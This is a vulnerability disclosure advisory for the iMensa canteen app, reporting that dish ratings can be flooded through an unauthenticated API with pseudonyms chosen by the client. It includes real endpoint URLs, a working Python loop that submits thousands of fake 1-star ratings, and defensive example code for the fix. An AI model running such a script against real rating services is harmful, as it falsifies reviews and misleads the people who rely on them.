SIK-2017-019


Title:

iMensa food ratings manipulable

Report ID

SIK-2017-019

Summary:

  • Vendor: Intelligent Systems GmbH
  • Product: iMensa
  • Affected Version: Any versions
  • Severity: Ratings can be manipulated at will. This may influence how many people visit the canteen.
  • Short summary: A dish can be rated any number of times with a simple, unauthenticated HTTP request

Details:

All dishes of a canteen are listed at the following URL (the canteen id precedes ".json"):

http://app.imensa.de/api/1.10.8/de.imensa.app.ios/.json

Example for HDA Schoefferstrasse, whose canteen id is dar3:

http://app.imensa.de/api/1.10.8/de.imensa.app.ios/dar3.json

Dishes are rated with a simple HTTP POST request containing the number of stars, the dish id and a user id ("pseudonym"). The user id is chosen by the client and is not verified by the server, so it can simply be generated at random for every request.

An example Python 2 script that rates a dish with 1 star many times, using a fresh pseudonym per request:

import urllib2

# Each iteration submits one 1-star rating for the same dish (meal 1198990 at dar3
# on 2017-06-02) under a different, unverified pseudonym.
for i in range(3100,9999):
    data = '{"refectory":"dar3","day":"2017-06-02","meal":"1198990","stars":1,"pseudonym":"593087636c'+ str(i) + '.36194932"}'
    print urllib2.urlopen("http://app.imensa.de/api/1.10.8/de.imensa.app.ios/rate.json",data).read()

Workaround

None available.

Suggested Mitigation

If you don't wish to receive fake ratings, make use of a proper authentication mechanism, so that a rating is tied to a verified user rather than to a pseudonym chosen by the client. CAPTCHAs might also be an option for preventing mass fake ratings.
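As an added illustration of the suggested mitigation (this is example code written for this advisory, not iMensa's own server code), a rating endpoint that accepts a rating only with a valid server-issued session, keys it to the authenticated user instead of the client-chosen pseudonym, and lets a repeat from the same user replace the earlier rating rather than count again. The session store, the in-memory rating store and the status messages are assumptions; the request fields are those of the rate.json request above.

```python
import json
from typing import Optional

# Constructed session store for this example: session token -> authenticated user.
SESSIONS = {"tok-alice": "alice", "tok-bob": "bob"}

# One entry per (user, refectory, day, meal) -> stars; a repeat replaces, never adds.
RATINGS = {}


def rate(body: str, session_token: Optional[str]):
    """Handle one rate.json POST body. Returns (http_status, message)."""
    user = SESSIONS.get(session_token or "")
    if user is None:
        # No valid session: reject, whatever "pseudonym" the body claims.
        return 401, "authentication required"
    try:
        req = json.loads(body)
        stars = int(req["stars"])
        key = (user, str(req["refectory"]), str(req["day"]), str(req["meal"]))
    except (ValueError, KeyError, TypeError):
        return 400, "malformed rating"
    if not 1 <= stars <= 5:
        return 400, "stars out of range"
    replaced = key in RATINGS
    RATINGS[key] = stars  # the same user's earlier rating is overwritten
    return 200, ("rating updated" if replaced else "rating recorded")


def average(refectory: str, day: str, meal: str):
    """Mean stars for one dish, or None if nobody has rated it."""
    vals = [s for (_, r, d, m), s in RATINGS.items() if (r, d, m) == (refectory, day, meal)]
    return sum(vals) / len(vals) if vals else None


if __name__ == "__main__":
    # Replay the advisory's loop: unauthenticated 1-star ratings under made-up pseudonyms.
    for i in range(3100, 3200):
        body = json.dumps({"refectory": "dar3", "day": "2017-06-02", "meal": "1198990",
                           "stars": 1, "pseudonym": "593087636c%d.36194932" % i})
        assert rate(body, None)[0] == 401
    print("flood rejected; average is", average("dar3", "2017-06-02", "1198990"))
```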

Timeline

  • 2017-08-09: Vulnerability found
  • 2017-08-09: Contacted developer
  • 2017-08-10: Sent advisory to developer
  • 2017-08-18: Vulnerability fixed